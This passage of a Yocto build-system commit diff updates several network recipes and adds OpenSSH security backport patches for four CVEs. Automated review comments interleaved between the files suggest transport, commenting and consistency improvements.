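+ file://0001-CVE-2023-40303-ftpd-rcp-rlogin-rsh-rshd-uucpd-fix-ch.patch \
+ file://0002-CVE-2023-40303-Indent-changes-in-previous-commit.patch \
 "
 
 SRC_URI[md5sum] = "04852c26c47cc8c6b825f2b74f191f52"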
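--- a/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
+++ b/meta/recipes-connectivity/libnss-mdns/libnss-mdns_0.14.1.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Name Service Switch module for Multicast DNS (zeroconf) name resolution"
 HOMEPAGE = "https://github.com/lathiat/nss-mdns"
+DESCRIPTION = "nss-mdns is a plugin for the GNU Name Service Switch (NSS) functionality of the GNU C Library (glibc) providing host name resolution via Multicast DNS (aka Zeroconf, aka Apple Rendezvous, aka Apple Bonjour), effectively allowing name resolution by common Unix/Linux programs in the ad-hoc mDNS domain .local."
 SECTION = "libs"
 
 LICENSE = "LGPLv2.1+"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2d5025d4aa3495befef8f17206a5b0a1"
 
 DEPENDS = "avahi"
 
-SRC_URI = "git://github.com/lathiat/nss-mdns \
+SRC_URI = "git://github.com/lathiat/nss-mdns;branch=master;protocol=https \
  "
 
 SRCREV = "41c9c5e78f287ed4b41ac438c1873fa71bfa70ae"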
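--- a/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
+++ b/meta/recipes-connectivity/mobile-broadband-provider-info/mobile-broadband-provider-info_git.bb
@@ -1,13 +1,15 @@
 SUMMARY = "Mobile Broadband Service Provider Database"
 HOMEPAGE = "http://live.gnome.org/NetworkManager/MobileBroadband/ServiceProviders"
+DESCRIPTION = "Mobile Broadband Service Provider Database stores service provider specific information. When this Database is available the information can be fetched there"
 SECTION = "network"
 LICENSE = "PD"
 LIC_FILES_CHKSUM = "file://COPYING;md5=87964579b2a8ece4bc6744d2dc9a8b04"
-SRCREV = "90f3fe28aa25135b7e4a54a7816388913bfd4a2a"
-PV = "20201225"
+
+SRCREV = "aae7c68671d225e6d35224613d5b98192b9b2ffe"
+PV = "20230416"
 PE = "1"
 
-SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https"
+SRC_URI = "git://gitlab.gnome.org/GNOME/mobile-broadband-provider-info.git;protocol=https;branch=main"
 S = "${WORKDIR}/git"
 
 inherit autotools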
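--- a/meta/recipes-connectivity/neard/neard_0.16.bb
+++ b/meta/recipes-connectivity/neard/neard_0.16.bb
@@ -2,21 +2,22 @@ SUMMARY = "Linux NFC daemon"
 DESCRIPTION = "A daemon for the Linux Near Field Communication stack"
 HOMEPAGE = "http://01.org/linux-nfc"
 LICENSE = "GPLv2"
+LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
+ file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
+ "
 
 DEPENDS = "dbus glib-2.0 libnl"
 
-SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BP}.tar.xz \
+SRC_URI = "git://git.kernel.org/pub/scm/network/nfc/neard.git;protocol=git;branch=master \
  file://neard.in \
  file://Makefile.am-fix-parallel-issue.patch \
  file://Makefile.am-do-not-ship-version.h.patch \
  file://0001-Add-header-dependency-to-nciattach.o.patch \
  "
-SRC_URI[md5sum] = "5c691fb7872856dc0d909c298bc8cb41"
-SRC_URI[sha256sum] = "eae3b11c541a988ec11ca94b7deab01080cd5b58cfef3ced6ceac9b6e6e65b36"
 
-LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e \
- file://src/near.h;beginline=1;endline=20;md5=358e4deefef251a4761e1ffacc965d13 \
- "
+SRCREV = "949795024f7625420e93e288c56e194cb9a3e74a"
+
+S = "${WORKDIR}/git"
 
 inherit autotools pkgconfig systemd update-rc.d
 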
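Review bot: The new `SRC_URI` fetches over `protocol=git`, the unauthenticated and unencrypted git transport, and it replaces a tarball whose `md5sum` and `sha256sum` entries are removed in the same hunk. `SRCREV` pins the commit, but the transport gives no server authentication and is often blocked by firewalls; the libnss-mdns and mobile-broadband-provider-info recipes in this commit use `protocol=https`. Suggested line: `SRC_URI = "git://git.kernel.org/pub/scm/network/nfc/neard.git;protocol=https;branch=master \`. It is also worth confirming that the pinned `SRCREV` corresponds to the 0.16 release named in the recipe file, since nothing visible here ties the two together.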
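--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2020-14145.patch
@@ -0,0 +1,97 @@
+From b3855ff053f5078ec3d3c653cdaedefaa5fc362d Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 05:23:03 +0000
+Subject: upstream: tweak the client hostkey preference ordering algorithm to
+
+prefer the default ordering if the user has a key that matches the
+best-preference default algorithm.
+
+feedback and ok markus@
+
+OpenBSD-Commit-ID: a92dd7d7520ddd95c0a16786a7519e6d0167d35f
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+---
+ sshconnect2.c | 41 ++++++++++++++++++++++++++++++++++++++---
+ 1 file changed, 38 insertions(+), 3 deletions(-)
+
+CVE: CVE-2020-14145
+Upstream-Status: Backport [https://anongit.mindrot.org/openssh.git/patch/?id=b3855ff053f5078ec3d3c653cdaedefaa5fc362d]
+Comment: Refreshed first hunk
+
+diff --git a/sshconnect2.c b/sshconnect2.c
+index 347e348c..f64aae66 100644
+--- a/sshconnect2.c
++++ b/sshconnect2.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: sshconnect2.c,v 1.320 2020/02/06 22:48:23 djm Exp $ */
++/* $OpenBSD: sshconnect2.c,v 1.326 2020/09/18 05:23:03 djm Exp $ */
+ /*
+ * Copyright (c) 2000 Markus Friedl. All rights reserved.
+ * Copyright (c) 2008 Damien Miller. All rights reserved.
+@@ -102,12 +102,25 @@ verify_host_key_callback(struct sshkey *hostkey, struct ssh *ssh)
+ return 0;
+ }
+
++/* Returns the first item from a comma-separated algorithm list */
++static char *
++first_alg(const char *algs)
++{
++ char *ret, *cp;
++
++ ret = xstrdup(algs);
++ if ((cp = strchr(ret, ',')) != NULL)
++ *cp = '\0';
++ return ret;
++}
++
+ static char *
+ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ {
+- char *oavail, *avail, *first, *last, *alg, *hostname, *ret;
++ char *oavail = NULL, *avail = NULL, *first = NULL, *last = NULL;
++ char *alg = NULL, *hostname = NULL, *ret = NULL, *best = NULL;
+ size_t maxlen;
+- struct hostkeys *hostkeys;
++ struct hostkeys *hostkeys = NULL;
+ int ktype;
+ u_int i;
+
+@@ -119,6 +132,26 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ for (i = 0; i < options.num_system_hostfiles; i++)
+ load_hostkeys(hostkeys, hostname, options.system_hostfiles[i]);
+
++ /*
++ * If a plain public key exists that matches the type of the best
++ * preference HostkeyAlgorithms, then use the whole list as is.
++ * Note that we ignore whether the best preference algorithm is a
++ * certificate type, as sshconnect.c will downgrade certs to
++ * plain keys if necessary.
++ */
++ best = first_alg(options.hostkeyalgorithms);
++ if (lookup_key_in_hostkeys_by_type(hostkeys,
++ sshkey_type_plain(sshkey_type_from_name(best)), NULL)) {
++ debug3("%s: have matching best-preference key type %s, "
++ "using HostkeyAlgorithms verbatim", __func__, best);
++ ret = xstrdup(options.hostkeyalgorithms);
++ goto out;
++ }
++
++ /*
++ * Otherwise, prefer the host key algorithms that match known keys
++ * while keeping the ordering of HostkeyAlgorithms as much as possible.
++ */
+ oavail = avail = xstrdup(options.hostkeyalgorithms);
+ maxlen = strlen(avail) + 1;
+ first = xmalloc(maxlen);
+@@ -159,6 +192,8 @@ order_hostkeyalgs(char *host, struct sockaddr *hostaddr, u_short port)
+ if (*first != '\0')
+ debug3("%s: prefer hostkeyalgs: %s", __func__, first);
+
++ out:
++ free(best);
+ free(first);
+ free(last);
+ free(hostname);
+--
+cgit v1.2.3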
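Review bot: `first_alg()` hands back memory from `xstrdup()` that the caller must release, but its comment says only that it returns the first item; `/* Returns a newly allocated copy of the first item of a comma-separated algorithm list; the caller frees it. */` would make the `free(best)` under `out:` self-explanatory. The early `goto out` in `order_hostkeyalgs` relies on the new `= NULL` initialisers so that `free(first)` and `free(last)` are safe before `xmalloc` has run, and that dependency deserves a short comment at the declarations. The rest of the `out:` cleanup, including anything for `oavail` and `hostkeys`, lies past the end of the last hunk and should be checked in the full function.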
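--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-28041.patch
@@ -0,0 +1,20 @@
+Description: fix double-free memory corruption in ssh-agent
+Author: Marc Deslauriers <marc.deslauriers@canonical.com>
+Origin: minimal fix for https://github.com/openssh/openssh-portable/commit/e04fd6dde16de1cdc5a4d9946397ff60d96568db
+
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+CVE: CVE-2021-28041
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/o/openssh/openssh_8.2p1-4ubuntu0.3.debian.tar.xz]
+Comment: No change in any hunk
+
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -496,6 +496,7 @@ process_add_identity(SocketEntry *e)
+ goto err;
+ }
+ free(ext_name);
++ ext_name = NULL;
+ break;
+ default:
+ error("%s: Unknown constraint %d", __func__, ctype);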
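--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2021-41617.patch
@@ -0,0 +1,52 @@
+From a6414400ec94a17871081f7df24f910a6ee01b8b Mon Sep 17 00:00:00 2001
+From: Ali Abdallah <aabdallah@suse.de>
+Date: Wed, 24 Nov 2021 13:33:39 +0100
+Subject: [PATCH] CVE-2021-41617 fix
+
+backport of the following two upstream commits
+
+f3cbe43e28fe71427d41cfe3a17125b972710455
+bf944e3794eff5413f2df1ef37cddf96918c6bde
+
+CVE-2021-41617 failed to correctly initialise supplemental groups
+when executing an AuthorizedKeysCommand or AuthorizedPrincipalsCommand,
+where a AuthorizedKeysCommandUser or AuthorizedPrincipalsCommandUser
+directive has been set to run the command as a different user. Instead
+these commands would inherit the groups that sshd(8) was started with.
+---
+ auth.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+CVE: CVE-2021-41617
+Upstream-Status: Backport [https://bugzilla.suse.com/attachment.cgi?id=854015]
+Comment: No change in any hunk
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/auth.c b/auth.c
+index 163038f..a47b267 100644
+--- a/auth.c
++++ b/auth.c
+@@ -52,6 +52,7 @@
+ #include <limits.h>
+ #include <netdb.h>
+ #include <time.h>
++#include <grp.h>
+
+ #include "xmalloc.h"
+ #include "match.h"
+@@ -851,6 +852,13 @@ subprocess(const char *tag, struct passwd *pw, const char *command,
+ }
+ closefrom(STDERR_FILENO + 1);
+
++ if (geteuid() == 0 &&
++ initgroups(pw->pw_name, pw->pw_gid) == -1) {
++ error("%s: initgroups(%s, %u): %s", tag,
++ pw->pw_name, (u_int)pw->pw_gid, strerror(errno));
++ _exit(1);
++ }
++
+ /* Don't use permanently_set_uid() here to avoid fatal() */
+ if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) == -1) {
+ error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid,
+--
+2.26.2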
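Review bot: The new `initgroups()` call in subprocess() runs only when `geteuid() == 0`, and nothing records the other case, where the child keeps the supplementary groups it inherited. A comment above the block, such as `/* reset supplementary groups while still root; must precede setresgid()/setresuid() */`, would explain why the call sits before the existing privilege drop. A `debug3` line on the skipped branch would make the non-root case visible in logs. subprocess() continues outside the hunk, so the later `setresuid` step is assumed and not shown here.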
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
new file mode 100644
index 0000000000..c899056337
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-01.patch
@@ -0,0 +1,189 @@
1From f6213e03887237714eb5bcfc9089c707069f87c5 Mon Sep 17 00:00:00 2001
2From: Damien Miller <djm@mindrot.org>
3Date: Fri, 1 Oct 2021 16:35:49 +1000
4Subject: [PATCH 01/12] make OPENSSL_HAS_ECC checks more thorough
5
6ok dtucker
7
8Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/dee22129bbc61e25b1003adfa2bc584c5406ef2d]
9CVE: CVE-2023-38408
10Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
11---
12 ssh-pkcs11-client.c | 16 ++++++++--------
13 ssh-pkcs11.c | 26 +++++++++++++-------------
14 2 files changed, 21 insertions(+), 21 deletions(-)
15
16diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
17index 8a0ffef..41114c7 100644
18--- a/ssh-pkcs11-client.c
19+++ b/ssh-pkcs11-client.c
20@@ -163,7 +163,7 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
21 return (ret);
22 }
23
24-#ifdef HAVE_EC_KEY_METHOD_NEW
25+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
26 static ECDSA_SIG *
27 ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
28 const BIGNUM *rp, EC_KEY *ec)
29@@ -220,12 +220,12 @@ ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
30 sshbuf_free(msg);
31 return (ret);
32 }
33-#endif /* HAVE_EC_KEY_METHOD_NEW */
34+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
35
36 static RSA_METHOD *helper_rsa;
37-#ifdef HAVE_EC_KEY_METHOD_NEW
38+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
39 static EC_KEY_METHOD *helper_ecdsa;
40-#endif /* HAVE_EC_KEY_METHOD_NEW */
41+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
42
43 /* redirect private key crypto operations to the ssh-pkcs11-helper */
44 static void
45@@ -233,10 +233,10 @@ wrap_key(struct sshkey *k)
46 {
47 if (k->type == KEY_RSA)
48 RSA_set_method(k->rsa, helper_rsa);
49-#ifdef HAVE_EC_KEY_METHOD_NEW
50+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
51 else if (k->type == KEY_ECDSA)
52 EC_KEY_set_method(k->ecdsa, helper_ecdsa);
53-#endif /* HAVE_EC_KEY_METHOD_NEW */
54+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
55 else
56 fatal("%s: unknown key type", __func__);
57 }
58@@ -247,7 +247,7 @@ pkcs11_start_helper_methods(void)
59 if (helper_rsa != NULL)
60 return (0);
61
62-#ifdef HAVE_EC_KEY_METHOD_NEW
63+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
64 int (*orig_sign)(int, const unsigned char *, int, unsigned char *,
65 unsigned int *, const BIGNUM *, const BIGNUM *, EC_KEY *) = NULL;
66 if (helper_ecdsa != NULL)
67@@ -257,7 +257,7 @@ pkcs11_start_helper_methods(void)
68 return (-1);
69 EC_KEY_METHOD_get_sign(helper_ecdsa, &orig_sign, NULL, NULL);
70 EC_KEY_METHOD_set_sign(helper_ecdsa, orig_sign, NULL, ecdsa_do_sign);
71-#endif /* HAVE_EC_KEY_METHOD_NEW */
72+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
73
74 if ((helper_rsa = RSA_meth_dup(RSA_get_default_method())) == NULL)
75 fatal("%s: RSA_meth_dup failed", __func__);
76diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
77index a302c79..b56a41b 100644
78--- a/ssh-pkcs11.c
79+++ b/ssh-pkcs11.c
80@@ -78,7 +78,7 @@ struct pkcs11_key {
81
82 int pkcs11_interactive = 0;
83
84-#ifdef HAVE_EC_KEY_METHOD_NEW
85+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
86 static void
87 ossl_error(const char *msg)
88 {
89@@ -89,7 +89,7 @@ ossl_error(const char *msg)
90 error("%s: libcrypto error: %.100s", __func__,
91 ERR_error_string(e, NULL));
92 }
93-#endif /* HAVE_EC_KEY_METHOD_NEW */
94+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
95
96 int
97 pkcs11_init(int interactive)
98@@ -190,10 +190,10 @@ pkcs11_del_provider(char *provider_id)
99
100 static RSA_METHOD *rsa_method;
101 static int rsa_idx = 0;
102-#ifdef HAVE_EC_KEY_METHOD_NEW
103+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
104 static EC_KEY_METHOD *ec_key_method;
105 static int ec_key_idx = 0;
106-#endif
107+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
108
109 /* release a wrapped object */
110 static void
111@@ -492,7 +492,7 @@ pkcs11_rsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
112 return (0);
113 }
114
115-#ifdef HAVE_EC_KEY_METHOD_NEW
116+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
117 /* openssl callback doing the actual signing operation */
118 static ECDSA_SIG *
119 ecdsa_do_sign(const unsigned char *dgst, int dgst_len, const BIGNUM *inv,
120@@ -604,7 +604,7 @@ pkcs11_ecdsa_wrap(struct pkcs11_provider *provider, CK_ULONG slotidx,
121
122 return (0);
123 }
124-#endif /* HAVE_EC_KEY_METHOD_NEW */
125+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
126
127 /* remove trailing spaces */
128 static void
129@@ -679,7 +679,7 @@ pkcs11_key_included(struct sshkey ***keysp, int *nkeys, struct sshkey *key)
130 return (0);
131 }
132
133-#ifdef HAVE_EC_KEY_METHOD_NEW
134+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
135 static struct sshkey *
136 pkcs11_fetch_ecdsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
137 CK_OBJECT_HANDLE *obj)
138@@ -802,7 +802,7 @@ fail:
139
140 return (key);
141 }
142-#endif /* HAVE_EC_KEY_METHOD_NEW */
143+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
144
145 static struct sshkey *
146 pkcs11_fetch_rsa_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
147@@ -910,7 +910,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
148 #endif
149 struct sshkey *key = NULL;
150 int i;
151-#ifdef HAVE_EC_KEY_METHOD_NEW
152+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
153 int nid;
154 #endif
155 const u_char *cp;
156@@ -999,7 +999,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
157 key->type = KEY_RSA;
158 key->flags |= SSHKEY_FLAG_EXT;
159 rsa = NULL; /* now owned by key */
160-#ifdef HAVE_EC_KEY_METHOD_NEW
161+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
162 } else if (EVP_PKEY_base_id(evp) == EVP_PKEY_EC) {
163 if (EVP_PKEY_get0_EC_KEY(evp) == NULL) {
164 error("invalid x509; no ec key");
165@@ -1030,7 +1030,7 @@ pkcs11_fetch_x509_pubkey(struct pkcs11_provider *p, CK_ULONG slotidx,
166 key->type = KEY_ECDSA;
167 key->flags |= SSHKEY_FLAG_EXT;
168 ec = NULL; /* now owned by key */
169-#endif /* HAVE_EC_KEY_METHOD_NEW */
170+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
171 } else {
172 error("unknown certificate key type");
173 goto out;
174@@ -1237,11 +1237,11 @@ pkcs11_fetch_keys(struct pkcs11_provider *p, CK_ULONG slotidx,
175 case CKK_RSA:
176 key = pkcs11_fetch_rsa_pubkey(p, slotidx, &obj);
177 break;
178-#ifdef HAVE_EC_KEY_METHOD_NEW
179+#if defined(OPENSSL_HAS_ECC) && defined(HAVE_EC_KEY_METHOD_NEW)
180 case CKK_ECDSA:
181 key = pkcs11_fetch_ecdsa_pubkey(p, slotidx, &obj);
182 break;
183-#endif /* HAVE_EC_KEY_METHOD_NEW */
184+#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */
185 default:
186 /* XXX print key type? */
187 key = NULL;
188--
1892.41.0
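Review bot: In the pkcs11_fetch_x509_pubkey hunk at -910, the `#endif` closing the guard around `int nid;` is left bare. Every other guard this patch touches gets the trailing comment, and the patch even adds it to the previously bare `#endif` after `ec_key_idx`. For consistency the line would read `#endif /* OPENSSL_HAS_ECC && HAVE_EC_KEY_METHOD_NEW */`. This is a style point only; the guard condition itself is applied uniformly across the visible hunks.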
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
new file mode 100644
index 0000000000..25ba921869
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-02.patch
@@ -0,0 +1,581 @@
1From 92cebfbcc221c9ef3f6bbb78da3d7699c0ae56be Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Wed, 19 Jul 2023 14:03:45 +0000
4Subject: [PATCH 02/12] upstream: Separate ssh-pkcs11-helpers for each p11
5 module
6
7Make ssh-pkcs11-client start an independent helper for each provider,
8providing better isolation between modules and reliability if a single
9module misbehaves.
10
11This also implements reference counting of PKCS#11-hosted keys,
12allowing ssh-pkcs11-helper subprocesses to be automatically reaped
13when no remaining keys reference them. This fixes some bugs we have
14that make PKCS11 keys unusable after they have been deleted, e.g.
15https://bugzilla.mindrot.org/show_bug.cgi?id=3125
16
17ok markus@
18
19OpenBSD-Commit-ID: 0ce188b14fe271ab0568f4500070d96c5657244e
20
21Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/099cdf59ce1e72f55d421c8445bf6321b3004755]
22CVE: CVE-2023-38408
23Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
24---
25 ssh-pkcs11-client.c | 372 +++++++++++++++++++++++++++++++++-----------
26 1 file changed, 282 insertions(+), 90 deletions(-)
27
28diff --git a/ssh-pkcs11-client.c b/ssh-pkcs11-client.c
29index 41114c7..4f3c6ed 100644
30--- a/ssh-pkcs11-client.c
31+++ b/ssh-pkcs11-client.c
32@@ -1,4 +1,4 @@
33-/* $OpenBSD: ssh-pkcs11-client.c,v 1.16 2020/01/25 00:03:36 djm Exp $ */
34+/* $OpenBSD: ssh-pkcs11-client.c,v 1.18 2023/07/19 14:03:45 djm Exp $ */
35 /*
36 * Copyright (c) 2010 Markus Friedl. All rights reserved.
37 * Copyright (c) 2014 Pedro Martelletto. All rights reserved.
38@@ -30,12 +30,11 @@
39 #include <string.h>
40 #include <unistd.h>
41 #include <errno.h>
42+#include <limits.h>
43
44 #include <openssl/ecdsa.h>
45 #include <openssl/rsa.h>
46
47-#include "openbsd-compat/openssl-compat.h"
48-
49 #include "pathnames.h"
50 #include "xmalloc.h"
51 #include "sshbuf.h"
52@@ -47,18 +46,140 @@
53 #include "ssh-pkcs11.h"
54 #include "ssherr.h"
55
56+#include "openbsd-compat/openssl-compat.h"
57+
58 /* borrows code from sftp-server and ssh-agent */
59
60-static int fd = -1;
61-static pid_t pid = -1;
62+/*
63+ * Maintain a list of ssh-pkcs11-helper subprocesses. These may be looked up
64+ * by provider path or their unique EC/RSA METHOD pointers.
65+ */
66+struct helper {
67+ char *path;
68+ pid_t pid;
69+ int fd;
70+ RSA_METHOD *rsa_meth;
71+ EC_KEY_METHOD *ec_meth;
72+ int (*rsa_finish)(RSA *rsa);
73+ void (*ec_finish)(EC_KEY *key);
74+ size_t nrsa, nec; /* number of active keys of each type */
75+};
76+static struct helper **helpers;
77+static size_t nhelpers;
78+
79+static struct helper *
80+helper_by_provider(const char *path)
81+{
82+ size_t i;
83+
84+ for (i = 0; i < nhelpers; i++) {
85+ if (helpers[i] == NULL || helpers[i]->path == NULL ||
86+ helpers[i]->fd == -1)
87+ continue;
88+ if (strcmp(helpers[i]->path, path) == 0)
89+ return helpers[i];
90+ }
91+ return NULL;
92+}
93+
94+static struct helper *
95+helper_by_rsa(const RSA *rsa)
96+{
97+ size_t i;
98+ const RSA_METHOD *meth;
99+
100+ if ((meth = RSA_get_method(rsa)) == NULL)
101+ return NULL;
102+ for (i = 0; i < nhelpers; i++) {
103+ if (helpers[i] != NULL && helpers[i]->rsa_meth == meth)
104+ return helpers[i];
105+ }
106+ return NULL;
107+
108+}
109+
110+static struct helper *
111+helper_by_ec(const EC_KEY *ec)
112+{
113+ size_t i;
114+ const EC_KEY_METHOD *meth;
115+
116+ if ((meth = EC_KEY_get_method(ec)) == NULL)
117+ return NULL;
118+ for (i = 0; i < nhelpers; i++) {
119+ if (helpers[i] != NULL && helpers[i]->ec_meth == meth)
120+ return helpers[i];
121+ }
122+ return NULL;
123+
124+}
125+
126+static void
127+helper_free(struct helper *helper)
128+{
129+ size_t i;
130+ int found = 0;
131+
132+ if (helper == NULL)
133+ return;
134+ if (helper->path == NULL || helper->ec_meth == NULL ||
135+ helper->rsa_meth == NULL)
136+ fatal("%s: inconsistent helper", __func__);
137+ debug3("%s: free helper for provider %s", __func__ , helper->path);
138+ for (i = 0; i < nhelpers; i++) {
139+ if (helpers[i] == helper) {
140+ if (found)
141+ fatal("%s: helper recorded more than once", __func__);
142+ found = 1;
143+ }
144+ else if (found)
145+ helpers[i - 1] = helpers[i];
146+ }
147+ if (found) {
148+ helpers = xrecallocarray(helpers, nhelpers,
149+ nhelpers - 1, sizeof(*helpers));
150+ nhelpers--;
151+ }
152+ free(helper->path);
153+ EC_KEY_METHOD_free(helper->ec_meth);
154+ RSA_meth_free(helper->rsa_meth);
155+ free(helper);
156+}
157+
158+static void
159+helper_terminate(struct helper *helper)
160+{
161+ if (helper == NULL) {
162+ return;
163+ } else if (helper->fd == -1) {
164+ debug3("%s: already terminated", __func__);
165+ } else {
166+ debug3("terminating helper for %s; "
167+ "remaining %zu RSA %zu ECDSA", __func__,
168+ helper->path, helper->nrsa, helper->nec);
169+ close(helper->fd);
170+ /* XXX waitpid() */
171+ helper->fd = -1;
172+ helper->pid = -1;
173+ }
174+ /*
175+ * Don't delete the helper entry until there are no remaining keys
176+ * that reference it. Otherwise, any signing operation would call
177+ * a free'd METHOD pointer and that would be bad.
178+ */
179+ if (helper->nrsa == 0 && helper->nec == 0)
180+ helper_free(helper);
181+}
182
183 static void
184-send_msg(struct sshbuf *m)
185+send_msg(int fd, struct sshbuf *m)
186 {
187 u_char buf[4];
188 size_t mlen = sshbuf_len(m);
189 int r;
190
191+ if (fd == -1)
192+ return;
193 POKE_U32(buf, mlen);
194 if (atomicio(vwrite, fd, buf, 4) != 4 ||
195 atomicio(vwrite, fd, sshbuf_mutable_ptr(m),
196@@ -69,12 +190,15 @@ send_msg(struct sshbuf *m)
197 }
198
199 static int
200-recv_msg(struct sshbuf *m)
201+recv_msg(int fd, struct sshbuf *m)
202 {
203 u_int l, len;
204 u_char c, buf[1024];
205 int r;
206
207+ sshbuf_reset(m);
208+ if (fd == -1)
209+ return 0; /* XXX */
210 if ((len = atomicio(read, fd, buf, 4)) != 4) {
211 error("read from helper failed: %u", len);
212 return (0); /* XXX */
213@@ -83,7 +207,6 @@ recv_msg(struct sshbuf *m)
214 if (len > 256 * 1024)
215 fatal("response too long: %u", len);
216 /* read len bytes into m */
217- sshbuf_reset(m);
218 while (len > 0) {
219 l = len;
220 if (l > sizeof(buf))
221@@ -104,14 +227,17 @@ recv_msg(struct sshbuf *m)
222 int
223 pkcs11_init(int interactive)
224 {
225- return (0);
226+ return 0;
227 }
228
229 void
230 pkcs11_terminate(void)
231 {
232- if (fd >= 0)
233- close(fd);
234+ size_t i;
235+
236+ debug3("%s: terminating %zu helpers", __func__, nhelpers);
237+ for (i = 0; i < nhelpers; i++)
238+ helper_terminate(helpers[i]);
239 }
240
241 static int
242@@ -122,7 +248,11 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
243 u_char *blob = NULL, *signature = NULL;
244 size_t blen, slen = 0;
245 int r, ret = -1;
246+ struct helper *helper;
247
248+ if ((helper = helper_by_rsa(rsa)) == NULL || helper->fd == -1)
249+ fatal("%s: no helper for PKCS11 key", __func__);
250+ debug3("%s: signing with PKCS11 provider %s", __func__, helper->path);
251 if (padding != RSA_PKCS1_PADDING)
252 goto fail;
253 key = sshkey_new(KEY_UNSPEC);
254@@ -144,10 +274,10 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
255 (r = sshbuf_put_string(msg, from, flen)) != 0 ||
256 (r = sshbuf_put_u32(msg, 0)) != 0)
257 fatal("%s: buffer error: %s", __func__, ssh_err(r));
258- send_msg(msg);
259+ send_msg(helper->fd, msg);
260 sshbuf_reset(msg);
261
262- if (recv_msg(msg) == SSH2_AGENT_SIGN_RESPONSE) {
263+ if (recv_msg(helper->fd, msg) == SSH2_AGENT_SIGN_RESPONSE) {
264 if ((r = sshbuf_get_string(msg, &signature, &slen)) != 0)
265 fatal("%s: buffer error: %s", __func__, ssh_err(r));
266 if (slen <= (size_t)RSA_size(rsa)) {
267@@ -163,7 +293,26 @@ rsa_encrypt(int flen, const u_char *from, u_char *to, RSA *rsa, int padding)
268 return (ret);
269 }
270
